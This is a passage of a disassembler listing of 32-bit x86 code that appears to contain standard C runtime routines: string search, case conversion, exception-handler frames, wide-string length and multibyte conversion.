mov eax, ebx
sub eax, edx
neg eax
sbb eax, eax
xor ecx, [ebp+4]
pop edi
and eax, ebx
pop esi
pop ebx
call sub_4182D6
leave
retn
sub_413859 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_413920 proc near ; CODE XREF: sub_403E06+23A�p
; sub_403E06+26B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_4139A0
mov dh, [ecx+1]
test dh, dh
jz short loc_41398D
loc_413938: ; CODE XREF: sub_413920+58�j
; sub_413920+6B�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
add esi, 1
cmp al, dl
jz short loc_41395E
test al, al
jz short loc_413958
loc_41394B: ; CODE XREF: sub_413920+36�j
mov al, [esi]
add esi, 1
loc_413950: ; CODE XREF: sub_413920+45�j
cmp al, dl
jz short loc_41395E
test al, al
jnz short loc_41394B
loc_413958: ; CODE XREF: sub_413920+29�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41395E: ; CODE XREF: sub_413920+25�j
; sub_413920+32�j
mov al, [esi]
add esi, 1
cmp al, dh
jnz short loc_413950
lea edi, [esi-1]
loc_41396A: ; CODE XREF: sub_413920+69�j
mov ah, [ecx+2]
test ah, ah
jz short loc_413999
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_413938
mov al, [ecx+3]
test al, al
jz short loc_413999
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_41396A
jmp short loc_413938
; ---------------------------------------------------------------------------
loc_41398D: ; CODE XREF: sub_413920+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_413F36
; ---------------------------------------------------------------------------
loc_413999: ; CODE XREF: sub_413920+4F�j
; sub_413920+5F�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_4139A0: ; CODE XREF: sub_413920+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_413920 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4139A6 proc near ; CODE XREF: sub_413A6E+1A�p
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
cmp dword ptr [esi+14h], 0
push edi
jz loc_413A5A
cmp dword ptr [esi+24h], 0
jz short loc_4139CC
cmp ebx, 7Fh
jbe loc_413A5A
loc_4139CC: ; CODE XREF: sub_4139A6+1B�j
xor edi, edi
inc edi
cmp ebx, 100h
jnb short loc_4139F6
cmp [esi+28h], edi
jle short loc_4139E9
push edi
push ebx
push esi
call sub_41608B
add esp, 0Ch
jmp short loc_4139F2
; ---------------------------------------------------------------------------
loc_4139E9: ; CODE XREF: sub_4139A6+34�j
mov eax, [esi+48h]
movzx eax, byte ptr [eax+ebx*2]
and eax, edi
loc_4139F2: ; CODE XREF: sub_4139A6+41�j
test eax, eax
jz short loc_413A67
loc_4139F6: ; CODE XREF: sub_4139A6+2F�j
mov edx, [esi+48h]
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_413A17
and byte ptr [ebp+arg_0+2], 0
push 2
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
pop eax
jmp short loc_413A20
; ---------------------------------------------------------------------------
loc_413A17: ; CODE XREF: sub_4139A6+60�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
mov eax, edi
loc_413A20: ; CODE XREF: sub_4139A6+6F�j
push edi
push dword ptr [esi+4]
lea ecx, [ebp+var_4]
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push 100h
push dword ptr [esi+14h]
call sub_4182E4
add esp, 20h
test eax, eax
jz short loc_413A67
cmp eax, edi
jnz short loc_413A4D
movzx eax, [ebp+var_4]
jmp short loc_413A69
; ---------------------------------------------------------------------------
loc_413A4D: ; CODE XREF: sub_4139A6+9F�j
movzx ecx, [ebp+var_3]
xor eax, eax
mov ah, [ebp+var_4]
or eax, ecx
jmp short loc_413A69
; ---------------------------------------------------------------------------
loc_413A5A: ; CODE XREF: sub_4139A6+11�j
; sub_4139A6+20�j
cmp ebx, 41h
jl short loc_413A67
cmp ebx, 5Ah
lea eax, [ebx+20h]
jle short loc_413A69
loc_413A67: ; CODE XREF: sub_4139A6+4E�j
; sub_4139A6+9B�j ...
mov eax, ebx
loc_413A69: ; CODE XREF: sub_4139A6+A5�j
; sub_4139A6+B2�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4139A6 endp
; =============== S U B R O U T I N E =======================================
sub_413A6E proc near ; CODE XREF: sub_4056EA+6�p
; sub_405AD5+56�p ...
arg_0 = dword ptr 4
call sub_415456
mov eax, [eax+64h]
cmp eax, off_42C7BC
jz short loc_413A83
call sub_41628E
loc_413A83: ; CODE XREF: sub_413A6E+E�j
push [esp+arg_0]
push eax
call sub_4139A6
pop ecx
pop ecx
retn
sub_413A6E endp
; =============== S U B R O U T I N E =======================================
sub_413A90 proc near ; CODE XREF: sub_405F05+27�p
; sub_405F46+4D�p
arg_0 = dword ptr 4
push 1
push [esp+4+arg_0]
call sub_413421
pop ecx
pop ecx
retn
sub_413A90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413A9E proc near ; CODE XREF: sub_418B60+60�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ebx, large fs:0
mov eax, [ebx]
mov large fs:0, eax
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov esp, [ebx-4]
mov ebp, [ebp+var_4]
jmp eax
sub_413A9E endp
; ---------------------------------------------------------------------------
pop ebx
leave
retn 8
; =============== S U B R O U T I N E =======================================
sub_413ACE proc near ; CODE XREF: sub_4187DB+25�p
; sub_4189E4+149�p ...
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_413ACE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413AD5 proc near ; CODE XREF: sub_413B81+5A�p
; sub_418B60:loc_418B83�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov esi, large fs:0
mov [ebp+var_4], esi
mov [ebp+var_8], offset loc_413AFE
push 0
push [ebp+arg_4]
push [ebp+var_8]
push [ebp+arg_0]
call sub_41E8A6
loc_413AFE: ; DATA XREF: sub_413AD5+12�o
mov eax, [ebp+arg_4]
mov eax, [eax+4]
and eax, 0FFFFFFFDh
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov edi, large fs:0
mov ebx, [ebp+var_4]
mov [ebx], edi
mov large fs:0, ebx
pop edi
pop esi
pop ebx
leave
retn 8
sub_413AD5 endp
; ---------------------------------------------------------------------------
loc_413B27: ; CODE XREF: .text:0041E8BF�j
push ebp
mov ebp, esp
sub esp, 4
push ebx
push esi
push edi
cld
mov [ebp-4], eax
xor eax, eax
push eax
push eax
push eax
push dword ptr [ebp-4]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_418E69
add esp, 20h
mov [ebp-4], eax
pop edi
pop esi
pop ebx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_413B5D: ; DATA XREF: sub_413D01+17�o
cld
mov eax, [esp+8]
push 0
push eax
push dword ptr [eax+10h]
push dword ptr [eax+8]
push 0
push dword ptr [esp+20h]
push dword ptr [eax+0Ch]
push dword ptr [esp+20h]
call sub_418E69
add esp, 20h
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413B81 proc near ; DATA XREF: sub_413D52+B�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
cld
mov eax, [ebp+arg_0]
mov eax, [eax+4]
and eax, 66h
test eax, eax
jz short loc_413BA2
mov eax, [ebp+arg_4]
mov dword ptr [eax+24h], 1
xor eax, eax
inc eax
jmp short loc_413BEF
; ---------------------------------------------------------------------------
loc_413BA2: ; CODE XREF: sub_413B81+10�j
push 1
mov eax, [ebp+arg_4]
push dword ptr [eax+14h]
mov eax, [ebp+arg_4]
push dword ptr [eax+10h]
mov eax, [ebp+arg_4]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
mov eax, [ebp+arg_4]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_418E69
add esp, 20h
mov eax, [ebp+arg_4]
cmp dword ptr [eax+24h], 0
jnz short loc_413BE0
push [ebp+arg_0]
push [ebp+arg_4]
call sub_413AD5
loc_413BE0: ; CODE XREF: sub_413B81+52�j
mov ebx, [ebp+arg_4]
mov esp, [ebx+1Ch]
mov ebp, [ebx+20h]
jmp dword ptr [ebx+18h]
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
loc_413BEF: ; CODE XREF: sub_413B81+1F�j
pop ebx
pop ebp
retn
sub_413B81 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413BF2 proc near ; CODE XREF: sub_418BC7+52�p
; sub_418C87+E2�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, [edi+0Ch]
mov ebx, [edi+10h]
mov eax, esi
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
jl short loc_413C48
loc_413C10: ; CODE XREF: sub_413BF2+51�j
cmp esi, 0FFFFFFFFh
jnz short loc_413C1A
call sub_418F40
loc_413C1A: ; CODE XREF: sub_413BF2+21�j
mov ecx, [ebp+arg_8]
dec esi
lea eax, [esi+esi*4]
lea eax, [ebx+eax*4]
cmp [eax+4], ecx
jge short loc_413C2E
cmp ecx, [eax+8]
jle short loc_413C33
loc_413C2E: ; CODE XREF: sub_413BF2+35�j
cmp esi, 0FFFFFFFFh
jnz short loc_413C3F
loc_413C33: ; CODE XREF: sub_413BF2+3A�j
mov eax, [ebp+arg_0]
dec [ebp+arg_4]
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
loc_413C3F: ; CODE XREF: sub_413BF2+3F�j
cmp [ebp+arg_4], 0
jge short loc_413C10
mov eax, [ebp+var_4]
loc_413C48: ; CODE XREF: sub_413BF2+1C�j
mov ecx, [ebp+arg_C]
inc esi
mov [ecx], esi
mov ecx, [ebp+arg_10]
mov [ecx], eax
cmp eax, [edi+0Ch]
ja short loc_413C5C
cmp esi, eax
jbe short loc_413C61
loc_413C5C: ; CODE XREF: sub_413BF2+64�j
call sub_418F40
loc_413C61: ; CODE XREF: sub_413BF2+68�j
pop edi
lea eax, [esi+esi*4]
pop esi
lea eax, [ebx+eax*4]
pop ebx
leave
retn
sub_413BF2 endp
; =============== S U B R O U T I N E =======================================
sub_413C6C proc near ; CODE XREF: sub_41883D+28�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
mov [esi], eax
call sub_415456
mov eax, [eax+84h]
mov [esi+4], eax
call sub_415456
mov [eax+84h], esi
mov eax, esi
pop esi
retn
sub_413C6C endp
; =============== S U B R O U T I N E =======================================
sub_413C94 proc near ; CODE XREF: sub_418980+4B�p
arg_0 = dword ptr 4
call sub_415456
mov eax, [eax+84h]
jmp short loc_413CAC
; ---------------------------------------------------------------------------
loc_413CA1: ; CODE XREF: sub_413C94+1A�j
mov ecx, [eax]
cmp ecx, [esp+arg_0]
jz short loc_413CB2
mov eax, [eax+4]
loc_413CAC: ; CODE XREF: sub_413C94+B�j
test eax, eax
jnz short loc_413CA1
inc eax
retn
; ---------------------------------------------------------------------------
loc_413CB2: ; CODE XREF: sub_413C94+13�j
xor eax, eax
retn
sub_413C94 endp
; =============== S U B R O U T I N E =======================================
sub_413CB5 proc near ; CODE XREF: sub_418980+9�p
arg_0 = dword ptr 4
push esi
call sub_415456
mov esi, [esp+4+arg_0]
cmp esi, [eax+84h]
jnz short loc_413CD7
call sub_415456
mov ecx, [esi+4]
mov [eax+84h], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_413CD7: ; CODE XREF: sub_413CB5+10�j
call sub_415456
mov eax, [eax+84h]
jmp short loc_413CED
; ---------------------------------------------------------------------------
loc_413CE4: ; CODE XREF: sub_413CB5+3C�j
mov ecx, [eax+4]
cmp esi, ecx
jz short loc_413CF9
mov eax, ecx
loc_413CED: ; CODE XREF: sub_413CB5+2D�j
cmp dword ptr [eax+4], 0
jnz short loc_413CE4
pop esi
jmp sub_418F40
; ---------------------------------------------------------------------------
loc_413CF9: ; CODE XREF: sub_413CB5+34�j
mov ecx, [esi+4]
mov [eax+4], ecx
pop esi
retn
sub_413CB5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413D01 proc near ; CODE XREF: sub_41883D+71�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_4]
and [ebp+var_14], 0
mov ecx, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, [ebp+arg_C]
inc eax
mov [ebp+var_10], offset loc_413B5D
mov [ebp+var_8], ecx
mov [ebp+var_4], eax
mov eax, large fs:0
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
mov large fs:0, eax
push [ebp+arg_10]
push ecx
push [ebp+arg_8]
call sub_418F70
mov ecx, eax
mov eax, [ebp+var_14]
mov large fs:0, eax
mov eax, ecx
leave
retn
sub_413D01 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413D52 proc near ; CODE XREF: sub_418BC7+33�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
and [ebp+var_28], 0
mov [ebp+var_24], offset sub_413B81
mov eax, [ebp+arg_10]
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_14]
mov [ebp+var_18], eax
mov eax, [ebp+arg_18]
mov [ebp+var_14], eax
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_8], 0
and [ebp+var_4], 0
mov [ebp+var_10], offset loc_413DD5
mov [ebp+var_C], esp
mov [ebp+var_8], ebp
mov eax, large fs:0
mov [ebp+var_28], eax
lea eax, [ebp+var_28]
mov large fs:0, eax
mov [ebp+var_34], 1
mov eax, [ebp+arg_0]
mov [ebp+var_30], eax
mov eax, [ebp+arg_8]
mov [ebp+var_2C], eax
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call sub_415456
call dword ptr [eax+74h]
pop ecx
pop ecx
and [ebp+var_34], 0
loc_413DD5: ; DATA XREF: sub_413D52+3A�o
cmp [ebp+var_4], 0
jz short loc_413DF2
mov ebx, large fs:0
mov eax, [ebx]
mov ebx, [ebp+var_28]
mov [ebx], eax
mov large fs:0, ebx
jmp short loc_413DFB
; ---------------------------------------------------------------------------
loc_413DF2: ; CODE XREF: sub_413D52+87�j
mov eax, [ebp+var_28]
mov large fs:0, eax
loc_413DFB: ; CODE XREF: sub_413D52+9E�j
mov eax, [ebp+var_34]
pop ebx
leave
retn
sub_413D52 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413E04 proc near ; CODE XREF: sub_41BAF0+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_413E1C
push [ebp+arg_0]
call sub_41E8A6
loc_413E1C: ; DATA XREF: sub_413E04+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_413E04 endp
; =============== S U B R O U T I N E =======================================
sub_413E24 proc near ; DATA XREF: sub_413E46+A�o
; sub_413EAE+9�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_413E45
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_413E45: ; CODE XREF: sub_413E24+10�j
retn
sub_413E24 endp
; =============== S U B R O U T I N E =======================================
sub_413E46 proc near ; CODE XREF: sub_41BAF0+67�p
; sub_41BAF0+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_413E24
push large dword ptr fs:0
mov large fs:0, esp
loc_413E63: ; CODE XREF: sub_413E46:loc_413E9E�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_413EA0
cmp esi, [esp+1Ch+arg_4]
jz short loc_413EA0
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_413E9E
push 101h
mov eax, [ebx+esi*4+8]
call sub_413EDA
call dword ptr [ebx+esi*4+8]
loc_413E9E: ; CODE XREF: sub_413E46+44�j
jmp short loc_413E63
; ---------------------------------------------------------------------------
loc_413EA0: ; CODE XREF: sub_413E46+2A�j
; sub_413E46+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_413E46 endp
; =============== S U B R O U T I N E =======================================
sub_413EAE proc near ; CODE XREF: sub_418980+55�p
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_413E24
jnz short locret_413ED0
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_413ED0
mov eax, 1
locret_413ED0: ; CODE XREF: sub_413EAE+10�j
; sub_413EAE+1B�j
retn
sub_413EAE endp
; =============== S U B R O U T I N E =======================================
sub_413ED1 proc near ; CODE XREF: sub_418F70+1E�p
; sub_418F70+40�p
push ebx
push ecx
mov ebx, offset dword_42C730
jmp short loc_413EE4
sub_413ED1 endp
; =============== S U B R O U T I N E =======================================
sub_413EDA proc near ; CODE XREF: sub_413E46+4F�p
; sub_41BAF0+78�p
push ebx
push ecx
mov ebx, offset dword_42C730
mov ecx, [ebp+8]
loc_413EE4: ; CODE XREF: sub_413ED1+7�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_413EDA endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_413EF4 proc near ; CODE XREF: sub_405F46+5�p
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_413EF4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_413F30
loc_413F20: ; CODE XREF: sub_413F30+1F�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_413F30
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_413F30 proc near ; CODE XREF: sub_405FC7+21�p
; sub_406702+32�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 00413F20 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_413F36: ; CODE XREF: sub_413920+74�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_413F5D
loc_413F48: ; CODE XREF: sub_413F30+2B�j
mov cl, [edx]
add edx, 1
cmp cl, bl
jz short loc_413F20
test cl, cl
jz short loc_413FA6
test edx, 3
jnz short loc_413F48
loc_413F5D: ; CODE XREF: sub_413F30+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_413F68: ; CODE XREF: sub_413F30+63�j
; sub_413F30+72�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_413FAA
and eax, 81010100h
jz short loc_413F68
and eax, 1010100h
jnz short loc_413FA4
and esi, 80000000h
jnz short loc_413F68
loc_413FA4: ; CODE XREF: sub_413F30+6A�j
; sub_413F30+83�j ...
pop esi
pop edi
loc_413FA6: ; CODE XREF: sub_413F30+23�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_413FAA: ; CODE XREF: sub_413F30+5C�j
mov eax, [edx-4]
cmp al, bl
jz short loc_413FE7
test al, al
jz short loc_413FA4
cmp ah, bl
jz short loc_413FE0
test ah, ah
jz short loc_413FA4
shr eax, 10h
cmp al, bl
jz short loc_413FD9
test al, al
jz short loc_413FA4
cmp ah, bl
jz short loc_413FD2
test ah, ah
jz short loc_413FA4
jmp short loc_413F68
; ---------------------------------------------------------------------------
loc_413FD2: ; CODE XREF: sub_413F30+9A�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_413FD9: ; CODE XREF: sub_413F30+92�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_413FE0: ; CODE XREF: sub_413F30+87�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_413FE7: ; CODE XREF: sub_413F30+7F�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_413F30 endp
; =============== S U B R O U T I N E =======================================
sub_413FEE proc near ; CODE XREF: sub_4065CE+55�p
; sub_40E9C5+239�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
loc_413FF2: ; CODE XREF: sub_413FEE+C�j
mov cx, [eax]
inc eax
inc eax
test cx, cx
jnz short loc_413FF2
sub eax, [esp+arg_0]
sar eax, 1
dec eax
retn
sub_413FEE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414004 proc near ; CODE XREF: sub_4140FA+22�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
push ebx
push esi
xor esi, esi
xor eax, eax
cmp edx, esi
push edi
jz loc_4140CB
mov ebx, [ebp+arg_C]
cmp ebx, esi
jz loc_4140F5
mov edi, [ebp+arg_0]
cmp [edi+14h], esi
jnz short loc_414056
cmp ebx, esi
jbe loc_4140F5
loc_414035: ; CODE XREF: sub_414004+4B�j
mov ecx, [ebp+arg_8]
add ecx, eax
movzx si, byte ptr [ecx]
mov [edx], si
cmp byte ptr [ecx], 0
jz loc_4140F5
inc eax
inc edx
inc edx
cmp eax, ebx
jb short loc_414035
jmp loc_4140F5
; ---------------------------------------------------------------------------
loc_414056: ; CODE XREF: sub_414004+27�j
mov esi, ds:dword_41F0A8
push ebx
mov ebx, [ebp+arg_8]
push edx
push 0FFFFFFFFh
push ebx
push 9
push dword ptr [edi+4]
call esi
test eax, eax
jnz loc_4140F4
call ds:dword_41F008
cmp eax, 7Ah
jz short loc_41408E
loc_41407E: ; CODE XREF: sub_414004+C5�j
; sub_414004+EE�j
call sub_417C70
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp short loc_4140F5
; ---------------------------------------------------------------------------
loc_41408E: ; CODE XREF: sub_414004+78�j
mov eax, [ebp+arg_C]
mov [ebp+var_4], eax
mov eax, ebx
loc_414096: ; CODE XREF: sub_414004+AE�j
mov cl, [eax]
dec [ebp+var_4]
test cl, cl
jz short loc_4140B4
mov edx, [edi+48h]
movzx ecx, cl
test byte ptr [edx+ecx*2+1], 80h
jz short loc_4140AD
inc eax
loc_4140AD: ; CODE XREF: sub_414004+A6�j
inc eax
cmp [ebp+var_4], 0
jnz short loc_414096
loc_4140B4: ; CODE XREF: sub_414004+99�j
push [ebp+arg_C]
sub eax, ebx
push [ebp+arg_4]
push eax
push ebx
push 1
push dword ptr [edi+4]
call esi
test eax, eax
jnz short loc_4140F5
jmp short loc_41407E
; ---------------------------------------------------------------------------
loc_4140CB: ; CODE XREF: sub_414004+10�j
mov eax, [ebp+arg_0]
cmp [eax+14h], esi
jnz short loc_4140DE
push [ebp+arg_8]
call sub_416000
pop ecx
jmp short loc_4140F5
; ---------------------------------------------------------------------------
loc_4140DE: ; CODE XREF: sub_414004+CD�j
push esi
push esi
push 0FFFFFFFFh
push [ebp+arg_8]
push 9
push dword ptr [eax+4]
call ds:dword_41F0A8
cmp eax, esi
jz short loc_41407E
loc_4140F4: ; CODE XREF: sub_414004+69�j
dec eax
loc_4140F5: ; CODE XREF: sub_414004+1B�j
; sub_414004+2B�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_414004 endp
; =============== S U B R O U T I N E =======================================
sub_4140FA proc near ; CODE XREF: sub_4065CE+19�p
; sub_4065CE+49�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
call sub_415456
mov eax, [eax+64h]
cmp eax, off_42C7BC
jz short loc_41410F
call sub_41628E
loc_41410F: ; CODE XREF: sub_4140FA+E�j
push [esp+arg_8]
push [esp+4+arg_4]
push [esp+8+arg_0]
push eax
call sub_414004
add esp, 10h
retn
sub_4140FA endp
; =============== S U B R O U T I N E =======================================
sub_414125 proc near ; CODE XREF: sub_4078FA+4D6C�p
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_41F0B8
test eax, eax
jnz short loc_41413B
call ds:dword_41F008
jmp short loc_41413D
; ---------------------------------------------------------------------------
loc_41413B: ; CODE XREF: sub_414125+C�j
xor eax, eax
loc_41413D: ; CODE XREF: sub_414125+14�j
test eax, eax
jz short loc_41414C
push eax
call sub_417C82
pop ecx
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_41414C: ; CODE XREF: sub_414125+1A�j
xor eax, eax
retn
sub_414125 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41414F proc near ; CODE XREF: sub_4078FA+4CD6�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push 14h
push offset stru_427750
call __SEH_prolog
mov esi, [ebp+arg_0]
mov [ebp+var_1C], esi
push esi
call sub_416673
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_418FBC
mov [ebp+var_20], eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
push esi
call sub_414CA3
mov [ebp+var_24], eax
push esi
push [ebp+var_20]
call sub_419044
add esp, 18h
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4141A3
mov eax, [ebp+var_24]
call __SEH_epilog
retn
sub_41414F endp
; =============== S U B R O U T I N E =======================================
sub_4141A3 proc near ; CODE XREF: sub_41414F+46�p
; DATA XREF: .rdata:stru_427750�o
push dword ptr [ebp-1Ch]
call sub_4166C5
pop ecx
retn
sub_4141A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4141AD proc near ; CODE XREF: sub_4078FA+3EE6�p
; sub_40D1EF+F6�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push ebx
call sub_416000
cmp eax, 1
pop ecx
jb short loc_4141E9
cmp byte ptr [ebx+1], 3Ah
jnz short loc_4141E9
mov esi, [ebp+arg_4]
test esi, esi
jz short loc_4141E5
push 2
push ebx
push esi
call sub_4195CB
add esp, 0Ch
and byte ptr [esi+2], 0
loc_4141E5: ; CODE XREF: sub_4141AD+26�j
inc ebx
inc ebx
jmp short loc_4141F3
; ---------------------------------------------------------------------------
